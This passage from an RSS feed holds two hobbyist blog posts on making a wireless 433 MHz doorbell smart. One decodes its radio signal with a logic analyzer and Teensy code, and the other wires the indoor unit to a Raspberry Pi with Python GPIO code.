<p>In the <a href="https://deadlime.hu/en/2020/12/07/ring-up-the-internet/">last post</a>, it was mentioned that you don't have to disassemble your indoor unit and resolder it. You can also build your own radio receiver. Today we will examine this option a bit more.</p>
<p>This approach is so far from hardware-hacking that we don't even need to take apart the device. In the product's technical specification, we can find all the information we need, like that it's sending the signals on 433.9 MHz. You can buy a <a href="https://www.aliexpress.com/wholesale?SearchText=433mhz+receiver">433.9 MHz receiver</a> on your favorite Chinese webshop, I've chosen <a href="https://www.aliexpress.com/item/32737335032.html">this model</a> without any serious research, but luckily it worked well.</p>
<p>And now we wait a month or so for the package to arrive. In the meantime, we can <a href="https://deadlime.hu/en/2020/12/07/ring-up-the-internet/">take the doorbell apart and wire it up with a Raspberry Pi</a>. :)</p>
<p>After the package arrived, we opened it with much excitement just to see that the antennas were not soldered into the modules, so we had to get the soldering iron out. Then I connected a LED to the data output of the receiver just to see if anything would happen if I pushed the doorbell.</p>

<video controls width="660" height="450">
    <source src="https://deadlime.hu/uploads/2021/led.mp4" type="video/mp4" />
</video>

<p>It's worth checking out in the video that the LED blinks randomly at first, then we only see a slight, more orderly flickering, then a longer off state and a longer on state, and it goes back to the random blinking. So the signal that the outdoor unit sends could be the more orderly flickering with the longer off/on state. The rest of the noise is a bit concerning. There will be a lot of garbage we have to ignore.</p>
<h3>More detailed analysis</h3>
<p>It would be nice to see more precisely what's going on. We could hook up a logic analyzer to the data output. Maybe it could help to find some useful information. Luckily there are cheap Chinese models we could order (I went with <a href="https://www.aliexpress.com/item/32850407090.html">this one</a>, but there is <a href="https://www.aliexpress.com/wholesale?SearchText=USB+Logic+Analyzer">a lot to choose from</a>). Another month of waiting and we can continue with the project.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/logic_analyzer.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>On my computer, I used <a href="https://sigrok.org/wiki/PulseView">PulseView</a> to display the incoming data. Below you can see the signal for a doorbell button press.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/pulseview_1.png" width="660" height="60" alt="" title="" loading="lazy" />
</p>

<p>It correlates nicely with our experience with the LED. The random parts are at the beginning and the end, the more orderly part in the middle that is closed by the long off/on state. Let's zoom into the more orderly part:</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/pulseview_2.png" width="660" height="60" alt="" title="" loading="lazy" />
</p>

<p>This is the part where we go from random to less random. It looks like the transmitter repeats the same pattern with small pauses around a hundred times.</p>
<p>If we zoom in a little bit more, we can identify two distinct patterns inside this repeating pattern. The first one is when a longer high state is followed by a shorter low state. We could name this binary one. The other is when a shorter high state is followed by a longer low state, which could be binary zero.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/pulseview_3.png" width="660" height="120" alt="" title="" loading="lazy" />
</p>

<p>We couldn't be sure what these 17 bits meant. Maybe it's an identifier for the receiver, maybe the 17. bit is not part of the data, and it's the part of the separators between data packs. In this case, we have 16 bits, which sounds a lot better. The good news is that we don't really care about the meaning of the data. It's always the same for every button press, so we just need to match this meaningless pattern for our project.</p>
<h3>The device</h3>
<p>I tried to replace the indoor receiver with an Arduino Uno, but I couldn't get the same pattern out of it as the logic analyzer showed before. Maybe the hardware is too slow to handle such a dense signal, or I messed up something, but the point is that I switched to a Teensy 3.1, and things got a lot better.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2021/teensy.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Fortunately, my Arduino code didn't need a lot of change to run on the new hardware. First, I wrote a program to print out how long the signal is in the high and low states to the serial console.</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> high_value = <span class="hljs-number">0</span>;
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> low_value = <span class="hljs-number">0</span>;
<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span> prev_time = <span class="hljs-number">0</span>;

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">setup</span><span class="hljs-params">()</span> </span>{
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">begin</span>(<span class="hljs-number">9600</span>);

  <span class="hljs-built_in">attachInterrupt</span>(<span class="hljs-number">23</span>, rising, RISING);
}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">loop</span><span class="hljs-params">()</span> </span>{}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">rising</span><span class="hljs-params">()</span> </span>{
  low_value = <span class="hljs-built_in">micros</span>() - prev_time;
  prev_time = <span class="hljs-built_in">micros</span>();

  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">print</span>(<span class="hljs-string">"H"</span>);
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">print</span>(high_value);
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">print</span>(<span class="hljs-string">", L"</span>);
  <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">println</span>(low_value);

  <span class="hljs-built_in">attachInterrupt</span>(<span class="hljs-number">23</span>, falling, FALLING);
}

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">falling</span><span class="hljs-params">()</span> </span>{
  high_value = <span class="hljs-built_in">micros</span>() - prev_time;
  prev_time = <span class="hljs-built_in">micros</span>();

  <span class="hljs-built_in">attachInterrupt</span>(<span class="hljs-number">23</span>, rising, RISING);
}
</code></pre>
<p>It was pretty easy to spot the repeating pattern:</p>
<pre class="console"><code>H631, L140
H632, L142
H630, L144
H242, L533
H626, L145
H629, L146
H239, L536
H239, L532
H627, L143
H627, L146
H239, L536
H238, L535
H240, L532
H627, L143
H241, L534
H241, L534
H626, L1683
</code></pre>
<p>It has some variance, but we can see the pattern for the binary ones and zeroes and the bigger pause after the last bit. Next, we need to replace the printing out to the detection of the ringing signal, and we are done:</p>
<pre><code class="hljs arduino"><span class="hljs-keyword">const</span> <span class="hljs-keyword">unsigned</span> short target = <span class="hljs-number">60612</span>;
<span class="hljs-keyword">unsigned</span> short value = <span class="hljs-number">0</span>;

<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">rising</span><span class="hljs-params">()</span> </span>{
  <span class="hljs-comment">// [...]</span>

  <span class="hljs-keyword">if</span> (high_value &gt;= <span class="hljs-number">620</span> &amp;&amp; high_value &lt;= <span class="hljs-number">640</span> &amp;&amp; low_value &gt;= <span class="hljs-number">130</span> &amp;&amp; low_value &lt;= <span class="hljs-number">150</span>) {
    value = (value &lt;&lt; <span class="hljs-number">1</span>) + <span class="hljs-number">1</span>;
  }
  <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (high_value &gt;= <span class="hljs-number">230</span> &amp;&amp; high_value &lt;= <span class="hljs-number">250</span> &amp;&amp; low_value &gt;= <span class="hljs-number">520</span> &amp;&amp; low_value &lt;= <span class="hljs-number">550</span>) {
    value = value &lt;&lt; <span class="hljs-number">1</span>;
  }
  <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (low_value &gt; <span class="hljs-number">1500</span>) {
    value = <span class="hljs-number">0</span>;
  }

  <span class="hljs-keyword">if</span> (value == target) {
    <span class="hljs-built_in">Serial</span>.<span class="hljs-built_in">println</span>(<span class="hljs-string">"Ding-dong"</span>);
  }

  <span class="hljs-comment">// [...]</span>
}
</code></pre>
<p>This works, but it has some naughtiness in it. For example we don't read the 17. bit (if it's part of the data what we don't know), it uses the longer pause after it to zero out the current value. But it's better this way because it wouldn't fit in a <code>short</code>.</p>
<p>Next is that it's a repeating pattern, so we get multiple &quot;Ding-Dong&quot; messages during a ringing. But not as many as we would need to get if we successfully matched every pattern. We can tweak the limits a little bit to have more freedom, or we could somehow detect the bigger gap between the patterns, but I leave this as an exercise to the reader.</p>
<p>If you are still not fed up with radio signals after this, then it could be an interesting project to create a custom transmitter as well. For example, creating your own doorbell button for your indoor unit or a universal button that sends every possible pattern and rings all the indoor units. :)</p>

]]></content:encoded>
        </item>
            <item>
            <title>Ring up the Internet</title>
            <link>https://deadlime.hu/en/2020/12/07/ring-up-the-internet/</link>
            <pubDate>Mon, 07 Dec 2020 19:57:03 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Raspberry Pi]]></category>
                    <category><![CDATA[Python]]></category>
                    <category><![CDATA[hardware]]></category>
                    
            <guid isPermaLink="false">d2efb5e180fc6c242594def929b04d3f</guid>
            <description>Making a wireless doorbell Internet-ready with some hardware upgrades</description>
            <content:encoded><![CDATA[<p>It's amazing what technology is capable of nowadays. For example, there are battery-powered buttons (interestingly enough, not necessarily operated with a button cell battery) that when they are pressed at the door, a doorbell will ring. It's magic. But what if you don't want to hear <em>Für Elise</em> (or one of the other 35 classic melodies the device offers) for the thousandth time? What if you want to receive a push notification on your phone?</p>
<p>Of course, there are commercially available devices that could do that, but we could choose a different path and try to make the current doorbell smarter. I hope I don't have to stress that everybody does everything at their own risk, but below you can find my experience.</p>
<h3>Ring me up</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/doorbell.jpg" width="600" height="360" alt="" title="" loading="lazy" />
</p>

<p>I have a similar doorbell than on the image above. On the left is the outdoor unit. It's a battery-powered button. On the right are the indoor units, which you can plug into a wall socket. I started the project by taking a closer look at the latter.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/pcb.jpg" width="660" height="480" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">A later stage of the visual inspection</p>

<p>The two bigger holes at the center are where the two pins of the socket plug were attached. I had to solder them out to be able to peel off the casing from the PCB. It's even better this way. After I tinkered with it, I wouldn't want to plug it back into the wall. So our first item on the agenda is to find out how much voltage the components need and how I can provide it for them.</p>
<h3>The voltage is dropping</h3>
<p>To the left from the socket connection, there is an IC with the <code>LP3773 A3DjC4</code> label (or maybe that <code>j</code> is an <code>i</code>, or just a scratch, it's hard to tell). I tried to find some information about that first. I found the datasheet of the <code>LP3773A</code>, and I hoped that the name was similar enough for it to be helpful. Unfortunately, most of it was written in Chinese, so I had a hard time deciphering it.</p>
<p>But at last, I found the relevant part, for an input voltage between 90V and 265V, its output voltage will be 5V. So next, we need a connection point.</p>
<p>My plan was to search for a couple of other components' datasheets and try to trace the &quot;lines&quot; until I found a suitable place. There is the antenna in the top right corner, and there is an IC near it that most likely will be in charge of the radio signal processing. Based on the <code>531R 1743</code> label and the little swirly logo, I guessed that the datasheet of <code>Synoxo SYN531R</code> would be good enough and found the following pinout there:</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/syn531r_pinout.png" width="300" height="210" alt="" title="" loading="lazy" />
</p>

<p>The <code>GND</code> and <code>VDD</code> connection right next to the <code>ANT</code> will be interesting for us. It's a single-layer PCB, so with some background light, we can follow them.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/pcb_light.jpg" width="660" height="540" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">Let there be light</p>

<p>The <code>GND</code> connects into the nice big chunk above the IC, but we cannot see where the <code>VDD</code> goes. Checking it out from different angles, it looked like it goes under the IC and comes out on the left. In both cases, we end up on a connection point (marked as <code>C09</code> on the PCB) which should hold a capacitor maybe. No worries, I soldered two cables into the two holes, plugged them into 5V, and lo and behold, the doorbell worked.</p>
<h3>Looney Tunes</h3>
<p>In its original state, our doorbell blinks and plays music when someone pushes the button. The LED is built right into the circuit, but the speaker is just dangling from the bottom of the PCB on two cables. There is another IC nearby we can look up. Based on the <code>FR0396-E2</code> label, I found another Chinese datasheet with the required diagram.</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/fr0396-e2_pinout.png" width="660" height="330" alt="" title="" loading="lazy" />
</p>

<p>The speaker is attached to the <code>PWM1</code> and <code>PWM2</code> pins, but we could connect it to a Raspberry Pi, for example. It couldn't handle PWM inputs, but we don't want to reproduce the melody from the signal. If something is changing there (because it starts to play a melody), then we want to know about it, and that's enough for our purposes.</p>
<h3>Internet of Doorbells</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2020/12/rpi.jpg" width="660" height="480" alt="" title="" loading="lazy" />
</p>

<p>It's nice that it works with 5V because this way, we can power it directly from the Raspberry Pi. I connected one of the speaker outputs to pin 23. We only need a little bit of Python code to handle the incoming rings.</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> signal
<span class="hljs-keyword">import</span> sys
<span class="hljs-keyword">import</span> RPi.GPIO <span class="hljs-keyword">as</span> GPIO

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">signal_handler</span><span class="hljs-params">(sig, frame)</span>:</span>
    GPIO.cleanup()
    sys.exit(<span class="hljs-number">0</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">button_pressed_callback</span><span class="hljs-params">(channel)</span>:</span>
    print(<span class="hljs-string">'Ding-dong'</span>)

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
    GPIO.setmode(GPIO.BCM)

    GPIO.setup(<span class="hljs-number">23</span>, GPIO.IN, pull_up_down=GPIO.PUD_UP)

    GPIO.add_event_detect(<span class="hljs-number">23</span>, GPIO.RISING, callback=button_pressed_callback, bouncetime=<span class="hljs-number">30000</span>)

    signal.signal(signal.SIGINT, signal_handler)
    signal.pause()
</code></pre>
<p>Naturally, we can come up with something more clever than <code>print('Ding-dong')</code> when the button is pressed. Sending messages, turning relays on or off, or anything your heart desires. Vigilant readers may have noticed the unusually high bounce time of the event detection. We need that because the melody can be 10-15 seconds long, and we don't want to handle that as separate events.</p>
<p>That would be it. The smartening of a dumb wireless doorbell. I have plans to develop an alternate solution where we would use a generic radio signal receiver, so we don't have to take apart the indoor unit. Maybe in another post. Until then, have a good ringing.</p>
<h3>Related materials</h3>
<ul>
<li><a href="https://pdf1.alldatasheet.com/datasheet-pdf/view/1146474/LANDP/LP3773A.html">LP3773A datasheet</a></li>
<li><a href="https://datasheet.lcsc.com/szlcsc/1811141751_Synoxo-SYN531R_C77785.pdf">Synoxo SYN531R datasheet</a></li>
<li><a href="http://www.sizeyuan.cn/wp-content/uploads/2018/06/F2-36%E9%A6%968%E5%90%88%E5%BC%A6%E9%97%A8%E9%93%83%E8%8A%AF%E7%89%87SOP8%E5%8A%9F%E8%83%BD%E8%AF%B4%E6%98%8E%E4%B9%A62019.11.6-2.pdf">FR0396-E2 datasheet</a></li>
</ul>

]]></content:encoded>
        </item>
        </channel>
</rss>
